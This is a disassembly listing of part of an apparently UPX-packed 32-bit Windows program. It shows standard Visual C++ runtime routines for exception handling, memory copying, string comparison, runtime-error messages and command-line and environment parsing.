; [00000045 BYTES: COLLAPSED FUNCTION __SEH_prolog4. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __SEH_epilog4. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_4058D0 proc near ; DATA XREF: __SEH_prolog4�o
; sub_409550+A�o
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 00409A11 SIZE 00000019 BYTES
sub esp, 14h
push ebx
mov ebx, [esp+18h+arg_4]
push ebp
push esi
mov esi, [ebx+8]
xor esi, ds:dword_40F060
push edi
mov eax, [esi]
cmp eax, 0FFFFFFFEh
mov [esp+24h+var_11], 0
mov [esp+24h+var_C], 1
lea edi, [ebx+10h]
jz short loc_405908
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_40224A
loc_405908: ; CODE XREF: sub_4058D0+29�j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_40224A
mov eax, [esp+24h+arg_0]
test byte ptr [eax+4], 66h
jnz loc_405A45
mov ebp, [ebx+0Ch]
cmp ebp, 0FFFFFFFEh
mov ecx, [esp+24h+arg_8]
lea edx, [esp+24h+var_8]
mov [esp+24h+var_8], eax
mov [esp+24h+var_4], ecx
mov [ebx-4], edx
jz short loc_40599F
loc_405941: ; CODE XREF: sub_4058D0+A2�j
lea eax, [ebp+ebp*2+0]
mov ecx, [esi+eax*4+14h]
test ecx, ecx
lea ebx, [esi+eax*4+10h]
mov eax, [ebx]
mov [esp+24h+var_10], eax
jz short loc_40596D
mov edx, edi
call sub_4099FA
test eax, eax
mov [esp+24h+var_11], 1
jl short loc_4059AB
jg short loc_4059B5
mov eax, [esp+24h+var_10]
loc_40596D: ; CODE XREF: sub_4058D0+85�j
cmp eax, 0FFFFFFFEh
mov ebp, eax
jnz short loc_405941
cmp [esp+24h+var_11], 0
jz short loc_40599F
loc_40597B: ; CODE XREF: sub_4058D0+E3�j
; sub_4058D0+191�j
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_40598F
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_40224A
loc_40598F: ; CODE XREF: sub_4058D0+B0�j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_40224A
loc_40599F: ; CODE XREF: sub_4058D0+6F�j
; sub_4058D0+A9�j ...
mov eax, [esp+24h+var_C]
pop edi
pop esi
pop ebp
pop ebx
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_4059AB: ; CODE XREF: sub_4058D0+95�j
mov [esp+24h+var_C], 0
jmp short loc_40597B
; ---------------------------------------------------------------------------
loc_4059B5: ; CODE XREF: sub_4058D0+97�j
mov ecx, [esp+24h+arg_0]
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_4059EB
cmp off_40C85C, 0
jz short loc_4059EB
push offset off_40C85C
call sub_409550
add esp, 4
test eax, eax
jz short loc_4059EB
mov edx, [esp+24h+arg_0]
push 1
push edx
call off_40C85C
add esp, 8
loc_4059EB: ; CODE XREF: sub_4058D0+EF�j
; sub_4058D0+F8�j ...
mov ecx, [esp+24h+arg_4]
call sub_409A2A
mov eax, [esp+24h+arg_4]
cmp [eax+0Ch], ebp
jz short loc_405A10
push offset dword_40F060
push edi
mov edx, ebp
mov ecx, eax
call sub_409A44
mov eax, [esp+24h+arg_4]
loc_405A10: ; CODE XREF: sub_4058D0+12B�j
mov ecx, [esp+24h+var_10]
mov [eax+0Ch], ecx
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_405A2B
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_40224A
loc_405A2B: ; CODE XREF: sub_4058D0+14C�j
mov ecx, [esi+0Ch]
mov edx, [esi+8]
add ecx, edi
xor ecx, [edx+edi]
call sub_40224A
mov ecx, [ebx+8]
mov edx, edi
jmp loc_409A11
; ---------------------------------------------------------------------------
loc_405A45: ; CODE XREF: sub_4058D0+50�j
cmp dword ptr [ebx+0Ch], 0FFFFFFFEh
jz loc_40599F
push offset dword_40F060
push edi
mov ecx, ebx
mov edx, 0FFFFFFFEh
call sub_409A44
jmp loc_40597B
sub_4058D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405A70 proc near ; CODE XREF: sub_40272B+4D�p
; sub_406FB3+CB�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_405A90
cmp edi, eax
jb loc_405C34
loc_405A90: ; CODE XREF: sub_405A70+16�j
cmp ecx, 100h
jb short loc_405AB7
cmp ds:dword_410A1C, 0
jz short loc_405AB7
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_405AB7
pop esi
pop edi
pop ebp
jmp sub_40908B
; ---------------------------------------------------------------------------
loc_405AB7: ; CODE XREF: sub_405A70+26�j
; sub_405A70+2F�j ...
test edi, 3
jnz short loc_405AD4
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_405AF4
rep movsd
jmp off_405BE4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_405AD4: ; CODE XREF: sub_405A70+4D�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_405AEC
and eax, 3
add ecx, eax
jmp dword ptr loc_405AF4+4[eax*4]
; ---------------------------------------------------------------------------
loc_405AEC: ; CODE XREF: sub_405A70+6E�j
jmp dword ptr loc_405BF4[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_405AF4: ; CODE XREF: sub_405A70+58�j
; sub_405A70+B6�j ...
jmp off_405B78[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_405B08
dd offset loc_405B34
dd offset loc_405B58
; ---------------------------------------------------------------------------
loc_405B08: ; DATA XREF: sub_405A70+8C�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_405AF4
rep movsd
jmp off_405BE4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_405B34: ; DATA XREF: sub_405A70+90�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_405AF4
rep movsd
jmp off_405BE4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_405B58: ; DATA XREF: sub_405A70+94�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_405AF4
rep movsd
jmp off_405BE4[edx*4]
; ---------------------------------------------------------------------------
align 4
off_405B78 dd offset loc_405BDB ; DATA XREF: sub_405A70:loc_405AF4�r
dd offset loc_405BC8
dd offset loc_405BC0
dd offset loc_405BB8
dd offset loc_405BB0
dd offset loc_405BA8
dd offset loc_405BA0
dd offset loc_405B98
; ---------------------------------------------------------------------------
loc_405B98: ; CODE XREF: sub_405A70:loc_405AF4�j
; DATA XREF: sub_405A70+124�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_405BA0: ; CODE XREF: sub_405A70:loc_405AF4�j
; DATA XREF: sub_405A70+120�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_405BA8: ; CODE XREF: sub_405A70:loc_405AF4�j
; DATA XREF: sub_405A70+11C�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_405BB0: ; CODE XREF: sub_405A70:loc_405AF4�j
; DATA XREF: sub_405A70+118�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_405BB8: ; CODE XREF: sub_405A70:loc_405AF4�j
; DATA XREF: sub_405A70+114�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_405BC0: ; CODE XREF: sub_405A70:loc_405AF4�j
; DATA XREF: sub_405A70+110�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_405BC8: ; CODE XREF: sub_405A70:loc_405AF4�j
; DATA XREF: sub_405A70+10C�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_405BDB: ; CODE XREF: sub_405A70:loc_405AF4�j
; DATA XREF: sub_405A70:off_405B78�o
jmp off_405BE4[edx*4]
; ---------------------------------------------------------------------------
align 4
off_405BE4 dd offset loc_405BF4 ; DATA XREF: sub_405A70+5C�r
; sub_405A70+BA�r ...
dd offset loc_405BFC
dd offset loc_405C08
dd offset loc_405C1C
; ---------------------------------------------------------------------------
loc_405BF4: ; CODE XREF: sub_405A70+5C�j
; sub_405A70+BA�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_405BFC: ; CODE XREF: sub_405A70+5C�j
; sub_405A70+BA�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_405C08: ; CODE XREF: sub_405A70+5C�j
; sub_405A70+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_405C1C: ; CODE XREF: sub_405A70+5C�j
; sub_405A70+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_405C34: ; CODE XREF: sub_405A70+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_405C68
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_405C5C
std
rep movsd
cld
jmp off_405D80[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_405C5C: ; CODE XREF: sub_405A70+1DD�j
; sub_405A70+238�j ...
neg ecx
jmp off_405D30[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_405C68: ; CODE XREF: sub_405A70+1D2�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_405C80
and eax, 3
sub ecx, eax
jmp dword ptr loc_405C80+4[eax*4]
; ---------------------------------------------------------------------------
loc_405C80: ; CODE XREF: sub_405A70+202�j
; DATA XREF: sub_405A70+209�r
jmp off_405D80[ecx*4]
; ---------------------------------------------------------------------------
align 4
xchg eax, esp
pop esp
inc eax
add [eax-1FFFBFA4h], bh
pop esp
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_405C5C
std
rep movsd
cld
jmp off_405D80[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_405C5C
std
rep movsd
cld
jmp off_405D80[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_405C5C
std
rep movsd
cld
jmp off_405D80[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_405D34
dd offset loc_405D3C
dd offset loc_405D44
dd offset loc_405D4C
dd offset loc_405D54
dd offset loc_405D5C
dd offset loc_405D64
off_405D30 dd offset loc_405D77 ; DATA XREF: sub_405A70+1EE�r
; ---------------------------------------------------------------------------
loc_405D34: ; DATA XREF: sub_405A70+2A4�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_405D3C: ; DATA XREF: sub_405A70+2A8�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_405D44: ; DATA XREF: sub_405A70+2AC�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_405D4C: ; DATA XREF: sub_405A70+2B0�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_405D54: ; DATA XREF: sub_405A70+2B4�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_405D5C: ; DATA XREF: sub_405A70+2B8�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_405D64: ; DATA XREF: sub_405A70+2BC�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_405D77: ; CODE XREF: sub_405A70+1EE�j
; DATA XREF: sub_405A70:off_405D30�o
jmp off_405D80[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_405D80 dd offset loc_405D90 ; DATA XREF: sub_405A70+1E3�r
; sub_405A70:loc_405C80�r ...
dd offset loc_405D98
dd offset loc_405DA8
dd offset loc_405DBC
; ---------------------------------------------------------------------------
loc_405D90: ; CODE XREF: sub_405A70+1E3�j
; sub_405A70:loc_405C80�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_405D98: ; CODE XREF: sub_405A70+1E3�j
; sub_405A70:loc_405C80�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_405DA8: ; CODE XREF: sub_405A70+1E3�j
; sub_405A70:loc_405C80�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_405DBC: ; CODE XREF: sub_405A70+1E3�j
; sub_405A70:loc_405C80�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_405A70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405DD5 proc near ; CODE XREF: sub_402786+7�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_40DF68
call __SEH_prolog4
push 0Eh
call sub_4079D2
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
mov ecx, [esi+4]
test ecx, ecx
jz short loc_405E26
mov eax, ds:dword_4101A8
mov edx, offset dword_4101A4
loc_405E01: ; CODE XREF: sub_405DD5+65�j
mov [ebp+var_1C], eax
test eax, eax
jz short loc_405E19
cmp [eax], ecx
jnz short loc_405E38
mov ecx, [eax+4]
mov [edx+4], ecx
push eax
call sub_404F20
pop ecx
loc_405E19: ; CODE XREF: sub_405DD5+31�j
push dword ptr [esi+4]
call sub_404F20
pop ecx
and dword ptr [esi+4], 0
loc_405E26: ; CODE XREF: sub_405DD5+20�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_405E3C
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_405E38: ; CODE XREF: sub_405DD5+35�j
mov edx, eax
jmp short loc_405E01
sub_405DD5 endp
; =============== S U B R O U T I N E =======================================
sub_405E3C proc near ; CODE XREF: sub_405DD5+58�p
; DATA XREF: UPX1:0040DF80�o
push 0Eh
call sub_4078FA
pop ecx
retn
sub_405E3C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405E50 proc near ; CODE XREF: sub_4027B0+C�p
; sub_404628+47�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_405E9C
loc_405E60: ; CODE XREF: sub_405E50+3C�j
; sub_405E50+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_405E94
or al, al
jz short loc_405E90
cmp ah, [ecx+1]
jnz short loc_405E94
or ah, ah
jz short loc_405E90
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_405E94
or al, al
jz short loc_405E90
cmp ah, [ecx+3]
jnz short loc_405E94
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_405E60
mov edi, edi
loc_405E90: ; CODE XREF: sub_405E50+18�j
; sub_405E50+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_405E94: ; CODE XREF: sub_405E50+14�j
; sub_405E50+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_405E9C: ; CODE XREF: sub_405E50+E�j
test edx, 1
jz short loc_405EBC
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_405E94
add ecx, 1
or al, al
jz short loc_405E90
test edx, 2
jz short loc_405E60
loc_405EBC: ; CODE XREF: sub_405E50+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_405E94
or al, al
jz short loc_405E90
cmp ah, [ecx+1]
jnz short loc_405E94
or ah, ah
jz short loc_405E90
add ecx, 2
jmp short loc_405E60
sub_405E50 endp
; =============== S U B R O U T I N E =======================================
sub_405ED8 proc near ; DATA XREF: sub_405F15�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_405F10
cmp dword ptr [eax+10h], 3
jnz short loc_405F10
mov eax, [eax+14h]
cmp eax, 19930520h
jz short loc_405F0B
cmp eax, 19930521h
jz short loc_405F0B
cmp eax, 19930522h
jz short loc_405F0B
cmp eax, 1994000h
jnz short loc_405F10
loc_405F0B: ; CODE XREF: sub_405ED8+1C�j
; sub_405ED8+23�j ...
call sub_407773
loc_405F10: ; CODE XREF: sub_405ED8+C�j
; sub_405ED8+12�j ...
xor eax, eax
retn 4
sub_405ED8 endp
; =============== S U B R O U T I N E =======================================
sub_405F15 proc near ; DATA XREF: UPX0:0040C154�o
push offset sub_405ED8
call dword_40C03C ; SetUnhandledExceptionFilter
xor eax, eax
retn
sub_405F15 endp
; =============== S U B R O U T I N E =======================================
sub_405F23 proc near ; CODE XREF: sub_403EFE+12�p
; sub_404E31+2A�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
mov ebx, [esp+8+arg_0]
push esi
push edi
xor esi, esi
xor edi, edi
loc_405F2F: ; CODE XREF: sub_405F23+19�j
cmp ebx, ds:dword_40F200[edi*8]
jz short loc_405F3E
inc edi
cmp edi, 17h
jb short loc_405F2F
loc_405F3E: ; CODE XREF: sub_405F23+13�j
cmp edi, 17h
jnb loc_4060BE
push ebp
push 3
call sub_409C89
cmp eax, 1
pop ecx
jz loc_40608A
push 3
call sub_409C89
test eax, eax
pop ecx
jnz short loc_405F72
cmp ds:dword_40F05C, 1
jz loc_40608A
loc_405F72: ; CODE XREF: sub_405F23+40�j
cmp ebx, 0FCh
jz loc_4060BD
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
mov ebx, 314h
push ebx
mov ebp, offset dword_4101B0
push ebp
call sub_404FAE
add esp, 0Ch
test eax, eax
jz short loc_405FA8
push esi
push esi
push esi
push esi
push esi
call sub_402095
add esp, 14h
loc_405FA8: ; CODE XREF: sub_405F23+76�j
push 104h
mov esi, offset byte_4101C9
push esi
push 0
mov ds:byte_4102CD, 0
call dword_40C09C ; GetModuleFileNameA
test eax, eax
jnz short loc_405FEC
push offset aProgramNameUnk ; "<program name unknown>"
push 2FBh
push esi
call sub_404FAE
add esp, 0Ch
test eax, eax
jz short loc_405FEC
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402095
add esp, 14h
loc_405FEC: ; CODE XREF: sub_405F23+A1�j
; sub_405F23+B8�j
push esi
call sub_4026A0
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_406031
push esi
call sub_4026A0
sub esi, 3Bh
add eax, esi
push 3
mov ecx, offset dword_4104C4
push offset a___ ; "..."
sub ecx, eax
push ecx
push eax
call sub_4027CB
add esp, 14h
test eax, eax
jz short loc_406031
xor esi, esi
push esi
push esi
push esi
push esi
push esi
call sub_402095
add esp, 14h
jmp short loc_406033
; ---------------------------------------------------------------------------
loc_406031: ; CODE XREF: sub_405F23+D4�j
; sub_405F23+FB�j
xor esi, esi
loc_406033: ; CODE XREF: sub_405F23+10C�j
push offset asc_40C820 ; "\n\n"
push ebx
push ebp
call sub_409C18
add esp, 0Ch
test eax, eax
jz short loc_406053
push esi
push esi
push esi
push esi
push esi
call sub_402095
add esp, 14h
loc_406053: ; CODE XREF: sub_405F23+121�j
push ds:off_40F204[edi*8]
push ebx
push ebp
call sub_409C18
add esp, 0Ch
test eax, eax
jz short loc_406075
push esi
push esi
push esi
push esi
push esi
call sub_402095
add esp, 14h
loc_406075: ; CODE XREF: sub_405F23+143�j
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebp
call sub_409A5B
add esp, 0Ch
jmp short loc_4060BD
; ---------------------------------------------------------------------------
loc_40608A: ; CODE XREF: sub_405F23+30�j
; sub_405F23+49�j
push 0FFFFFFF4h
call dword_40C000 ; GetStdHandle
mov ebp, eax
cmp ebp, esi
jz short loc_4060BD
cmp ebp, 0FFFFFFFFh
jz short loc_4060BD
push 0
lea eax, [esp+18h+var_4]
push eax
lea esi, ds:40F204h[edi*8]
push dword ptr [esi]
call sub_4026A0
pop ecx
push eax
push dword ptr [esi]
push ebp
call dword_40C014 ; WriteFile
loc_4060BD: ; CODE XREF: sub_405F23+55�j
; sub_405F23+165�j ...
pop ebp
loc_4060BE: ; CODE XREF: sub_405F23+1E�j
pop edi
pop esi
pop ebx
pop ecx
retn
sub_405F23 endp
; =============== S U B R O U T I N E =======================================
sub_4060C3 proc near ; CODE XREF: sub_403EFE+9�p
; sub_404E31+23�p ...
push 3
call sub_409C89
cmp eax, 1
pop ecx
jz short loc_4060E5
push 3
call sub_409C89
test eax, eax
pop ecx
jnz short locret_4060FB
cmp ds:dword_40F05C, 1
jnz short locret_4060FB
loc_4060E5: ; CODE XREF: sub_4060C3+B�j
push 0FCh
call sub_405F23
push 0FFh
call sub_405F23
pop ecx
pop ecx
locret_4060FB: ; CODE XREF: sub_4060C3+17�j
; sub_4060C3+20�j
retn
sub_4060C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4060FC proc near ; CODE XREF: UPX0:004040FC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
call sub_4048B0
mov esi, eax
test esi, esi
jz loc_406257
mov edx, [esi+5Ch]
mov eax, ds:dword_40F33C
push edi
mov edi, [ebp+arg_0]
mov ecx, edx
push ebx
loc_406120: ; CODE XREF: sub_4060FC+34�j
cmp [ecx], edi
jz short loc_406132
mov ebx, eax
imul ebx, 0Ch
add ecx, 0Ch
add ebx, edx
cmp ecx, ebx
jb short loc_406120
loc_406132: ; CODE XREF: sub_4060FC+26�j
imul eax, 0Ch
add eax, edx
cmp ecx, eax
jnb short loc_406143
cmp [ecx], edi
jnz short loc_406143
mov eax, ecx
jmp short loc_406145
; ---------------------------------------------------------------------------
loc_406143: ; CODE XREF: sub_4060FC+3D�j
; sub_4060FC+41�j
xor eax, eax
loc_406145: ; CODE XREF: sub_4060FC+45�j
test eax, eax
jz short loc_406153
mov ebx, [eax+8]
test ebx, ebx
mov [ebp+var_4], ebx
jnz short loc_40615A
loc_406153: ; CODE XREF: sub_4060FC+4B�j
xor eax, eax
jmp loc_406255
; ---------------------------------------------------------------------------
loc_40615A: ; CODE XREF: sub_4060FC+55�j
cmp ebx, 5
jnz short loc_40616B
and dword ptr [eax+8], 0
xor eax, eax
inc eax
jmp loc_406255
; ---------------------------------------------------------------------------
loc_40616B: ; CODE XREF: sub_4060FC+61�j
cmp ebx, 1
jz loc_406252
mov ecx, [esi+60h]
mov [ebp+var_8], ecx
mov ecx, [ebp+arg_4]
mov [esi+60h], ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_406244
mov ecx, ds:dword_40F330
mov edi, ds:dword_40F334
mov edx, ecx
add edi, ecx
cmp edx, edi
jge short loc_4061C4
imul ecx, 0Ch
loc_4061A3: ; CODE XREF: sub_4060FC+C3�j
mov edi, [esi+5Ch]
and dword ptr [ecx+edi+8], 0
mov edi, ds:dword_40F330
mov ebx, ds:dword_40F334
inc edx
add ebx, edi
add ecx, 0Ch
cmp edx, ebx
jl short loc_4061A3
mov ebx, [ebp+var_4]
loc_4061C4: ; CODE XREF: sub_4060FC+A2�j
mov eax, [eax]
cmp eax, 0C000008Eh
mov edi, [esi+64h]
jnz short loc_4061D9
mov dword ptr [esi+64h], 83h
jmp short loc_406237
; ---------------------------------------------------------------------------
loc_4061D9: ; CODE XREF: sub_4060FC+D2�j
cmp eax, 0C0000090h
jnz short loc_4061E9
mov dword ptr [esi+64h], 81h
jmp short loc_406237
; ---------------------------------------------------------------------------
loc_4061E9: ; CODE XREF: sub_4060FC+E2�j
cmp eax, 0C0000091h
jnz short loc_4061F9
mov dword ptr [esi+64h], 84h
jmp short loc_406237
; ---------------------------------------------------------------------------
loc_4061F9: ; CODE XREF: sub_4060FC+F2�j
cmp eax, 0C0000093h
jnz short loc_406209
mov dword ptr [esi+64h], 85h
jmp short loc_406237
; ---------------------------------------------------------------------------
loc_406209: ; CODE XREF: sub_4060FC+102�j
cmp eax, 0C000008Dh
jnz short loc_406219
mov dword ptr [esi+64h], 82h
jmp short loc_406237
; ---------------------------------------------------------------------------
loc_406219: ; CODE XREF: sub_4060FC+112�j
cmp eax, 0C000008Fh
jnz short loc_406229
mov dword ptr [esi+64h], 86h
jmp short loc_406237
; ---------------------------------------------------------------------------
loc_406229: ; CODE XREF: sub_4060FC+122�j
cmp eax, 0C0000092h
jnz short loc_406237
mov dword ptr [esi+64h], 8Ah
loc_406237: ; CODE XREF: sub_4060FC+DB�j
; sub_4060FC+EB�j ...
push dword ptr [esi+64h]
push 8
call ebx
pop ecx
mov [esi+64h], edi
jmp short loc_40624B
; ---------------------------------------------------------------------------
loc_406244: ; CODE XREF: sub_4060FC+8A�j
and dword ptr [eax+8], 0
push ecx
call ebx
loc_40624B: ; CODE XREF: sub_4060FC+146�j
mov eax, [ebp+var_8]
pop ecx
mov [esi+60h], eax
loc_406252: ; CODE XREF: sub_4060FC+72�j
or eax, 0FFFFFFFFh
loc_406255: ; CODE XREF: sub_4060FC+59�j
; sub_4060FC+6A�j
pop ebx
pop edi
loc_406257: ; CODE XREF: sub_4060FC+F�j
pop esi
leave
retn
sub_4060FC endp
; =============== S U B R O U T I N E =======================================
sub_40625A proc near ; CODE XREF: start:loc_4040B9�p
push esi
push edi
xor edi, edi
cmp ds:dword_410A0C, edi
jnz short loc_40626B
call sub_40842A
loc_40626B: ; CODE XREF: sub_40625A+A�j
mov esi, ds:dword_410A24
test esi, esi
jnz short loc_40627A
mov esi, offset byte_40DA4F
loc_40627A: ; CODE XREF: sub_40625A+19�j
; sub_40625A+4B�j
mov al, [esi]
cmp al, 20h
ja short loc_406288
test al, al
jz short loc_4062B2
test edi, edi
jz short loc_4062AC
loc_406288: ; CODE XREF: sub_40625A+24�j
cmp al, 22h
jnz short loc_406295
xor ecx, ecx
test edi, edi
setz cl
mov edi, ecx
loc_406295: ; CODE XREF: sub_40625A+30�j
movzx eax, al
push eax
call sub_409D20
test eax, eax
pop ecx
jz short loc_4062A4
inc esi
loc_4062A4: ; CODE XREF: sub_40625A+47�j
inc esi
jmp short loc_40627A
; ---------------------------------------------------------------------------
loc_4062A7: ; CODE XREF: sub_40625A+56�j
cmp al, 20h
ja short loc_4062B2
inc esi
loc_4062AC: ; CODE XREF: sub_40625A+2C�j
mov al, [esi]
test al, al
jnz short loc_4062A7
loc_4062B2: ; CODE XREF: sub_40625A+28�j
; sub_40625A+4F�j
pop edi
mov eax, esi
pop esi
retn
sub_40625A endp
; =============== S U B R O U T I N E =======================================
sub_4062B7 proc near ; CODE XREF: start:loc_404096�p
push ebx
xor ebx, ebx
cmp ds:dword_410A0C, ebx
push esi
push edi
jnz short loc_4062C9
call sub_40842A
loc_4062C9: ; CODE XREF: sub_4062B7+B�j
mov esi, ds:dword_40FE14
xor edi, edi
cmp esi, ebx
jnz short loc_4062ED
loc_4062D5: ; CODE XREF: sub_4062B7+51�j
or eax, 0FFFFFFFFh
jmp loc_406378
; ---------------------------------------------------------------------------
loc_4062DD: ; CODE XREF: sub_4062B7+3A�j
cmp al, 3Dh
jz short loc_4062E2
inc edi
loc_4062E2: ; CODE XREF: sub_4062B7+28�j
push esi
call sub_4026A0
pop ecx
lea esi, [esi+eax+1]
loc_4062ED: ; CODE XREF: sub_4062B7+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_4062DD
push 4
inc edi
push edi
call sub_405413
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
mov ds:dword_410180, edi
jz short loc_4062D5
mov esi, ds:dword_40FE14
